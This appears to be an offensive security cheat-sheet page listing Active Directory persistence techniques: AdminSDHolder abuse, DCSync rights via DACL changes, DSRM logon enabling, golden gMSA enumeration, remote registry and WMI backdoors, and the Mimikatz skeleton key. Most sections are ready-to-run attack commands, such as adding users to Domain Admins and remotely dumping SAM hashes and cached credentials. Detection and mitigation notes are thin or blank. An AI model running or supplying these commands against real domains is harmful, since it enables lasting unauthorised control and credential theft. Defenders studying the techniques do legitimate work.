Technics detailed @ thehacker.recipes / ad / persistence
Menu
Tools
| _repo | _last_pushed | _stars | _watch | _language |
|---|
adminsdholder
🔑 KEYPOINTS :
- special AD container with some “default” security permissions that is used as a template for protected AD accounts and groups
- roll backs the security permissions for protected accounts and group every 60 minutes, aka the Security Descriptor Propagator Update (SDProp) process.
▶️ PLAY :
# add the user to the adminsdholder group
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName spotless -Verbose -Rights All
# check the user has genericAll over the 'Domain Admins' group
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
# add the user back to the 'Domain Admins' group
net group "domain admins" spotless /add /domain
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"
🔎️ DETECT :
# find all users with security ACLs set by SDProp using the PowerShell AD cmdlets
Import-Module ActiveDirectory
Get-ADObject -LDAPFilter “(&(admincount=1)(|(objectcategory=person)(objectcategory=group)))” -Properties MemberOf,Created,Modified,AdminCount
# monitor the ACLs configured on the AdminSDHolder object. These should be kept at the default – it is not usually necessary to add other groups to the AdminSDHolder ACL.
# monitor users and groups with AdminCount = 1 to identify accounts with ACLs set by SDProp.
🛟 MITIGATE :
🕮 READ MORE at :
- thehacker.recipes/ad/persistence/adminsdholder.
- ired.team/abuse-adminsdholder
- adsecurity.org/adminsdholder
dacl-abuse
🔑 KEYPOINTS :
▶️ PLAY :
# as DA add dcsync rights to a low-level user
Add-DomainObjectAcl -TargetIdentity $ztarg_ou -PrincipalIdentity $ztarg_user_name -Rights DCSync -PrincipalDomain $zdom_fqdn -TargetDomain $zdom_fqdn -Verbose
🔎️ DETECT
🛟 MITIGATE :
# user added to privileged group
# shadow credentials
msDS-KeyCredentialLink
🕮 READ MORE at :
- thehacker.recipes/ad/movement/dacl.
- thehacker.recipes/ad/persistence/dacl.
- ired.team/abusing-active-directory-acls-aces
dc-shadow
🔑 KEYPOINTS :
- tbd
▶️ PLAY :
🔎️ DETECT :
🛟 MITIGATE :
🕮 READ MORE at :
dsrm
🔑 KEYPOINTS :
- DSRM stands for ‘Directory Services Restore Mode’
- allows remote access to the DC for the local admin accounts
- dump of local admins hash is required + activation of the feature in the registry
▶️ PLAY :
# check if the key exists and get the value
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior
# create key with value "2" if it doesn't exist
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD
# change value to "2"
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
🔎️ DETECT :
# EID: 4657 - Registry value modified
# EID: 12 - Registry Object Created/Deletion (sysmon)
🛟 MITIGATE :
🕮 READ MORE at :
golden-gmsa
🔑 KEYPOINTS :
- Group Managed Service Accounts (gMSA), which are managed directly by AD, with a strong password and a regular password rotation
- password are computed based on KDS root keys + gMSA account ‘msDS-ManagedPassword’ attribute value
- hack implemented by semperis/goldenGMSA tool
▶️ PLAY :
# enumerate KDS root keys, SID, RootKeyGuid, Password ID
GoldenGMSA.exe gmsainfo
# enumeration for a single gMSA
GoldenGMSA.exe gmsainfo --sid "S-1-5-21-[...]1586295871-1112"
🔎️ DETECT :
🛟 MITIGATE :
🕮 READ MORE at :
security-descriptors
🔑 KEYPOINTS :
▶️ PLAY :
DCOM
# set-RemoteDCOM
Powershell
# grant PS remote execution to a user
Set-RemotePSRemoting -UserName $ztarg_user_name -ComputerName $zdom_dc_name -Verbose
# remove the grant of PS remote execution
Set-RemotePSRemoting -UserName $ztarg_user_name -ComputerName $zdom_dc_name -Verbose -Remove
Registry
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName $zdom_dc_name -Trustee $ztarg_user_name -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName $zdom_dc_name -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName $zdom_dc_name -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName $zdom_dc_name -Verbose
SC Manager
- DEMO SCM backdoor / service creation
WMI
# grant WMI remote execution to a user
Set-RemoteWMI -UserName $ztarg_user_name -ComputerName $zdom_dc_name -namespace 'root\cimv2' -Verbose
# remove the grant of WMI remote execution
Set-RemoteWMI -UserName $ztarg_user_name -ComputerName $zdom_dc_name -namespace 'root\cimv2' -Remove -Verbose
🕮 READ MORE at :
skeleton-key
🔑 KEYPOINTS :
- hack that injects a master password into the lsass process on a DC
- enables the adversary to authenticate as any user without password
- does not persist to reboot
▶️ PLAY :
# execution on a DC
invoke-mimi 'misc::skeleton'
🔎️ DETECT :
🛟 MITIGATE :
🕮 READ MORE at :